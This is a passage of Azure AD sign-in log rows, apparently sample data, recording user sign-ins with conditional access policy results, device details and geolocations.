'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",c95450b3-582d-4306-9dd2-9bdaf6b21100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c95450b3-582d-4306-9dd2-9bdaf6b21100,SigninLogs,Sucess,38.73078156,-78.17196655
+1885,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:54.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",34805c5b-6a36-487d-9189-7bc13aca0e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,34805c5b-6a36-487d-9189-7bc13aca0e00,SigninLogs,Sucess,33.0175209,35.44601059
+1886,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:10.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3c31282f-125b-44e7-83fc-17e9bdd3fced,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4f5563e9-cd91-4aaf-8dc5-b5eeacde1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,4f5563e9-cd91-4aaf-8dc5-b5eeacde1100,SigninLogs,Sucess,33.7984581,-84.38828278
+1887,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:46.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d0527db0-2bd2-436e-80a5-c21ad5c679d8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f4c49c86-cb9e-4a04-9dcc-1dcd85380f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f4c49c86-cb9e-4a04-9dcc-1dcd85380f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1888,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:54.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",0d3dadc7-5b90-4194-87e2-04e000cb0e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0d3dadc7-5b90-4194-87e2-04e000cb0e00,SigninLogs,Sucess,33.0175209,35.44601059
+1889,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:13.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8f631d8-40f5-42ae-a16a-61fd284b4296,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",22fd8c7c-75eb-4549-80fa-172724a01000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,22fd8c7c-75eb-4549-80fa-172724a01000,SigninLogs,Sucess,33.7984581,-84.38828278
+1890,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:15.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,34b1f219-5d43-4d4e-81bb-6133d7644633,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f81997e3-0b26-42cc-8532-c4de20021200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f81997e3-0b26-42cc-8532-c4de20021200,SigninLogs,Sucess,33.7984581,-84.38828278
+1891,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,41:55.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a6c6469f-0031-0000-5683-46d8d582f4ee,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:41,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",e9cfabe1-d666-446f-aeb7-581772651100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e9cfabe1-d666-446f-aeb7-581772651100,SigninLogs,Sucess,33.7984581,-84.38828278
+1892,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:18.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,78c7469f-70e8-0000-4780-a8061a246885,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, 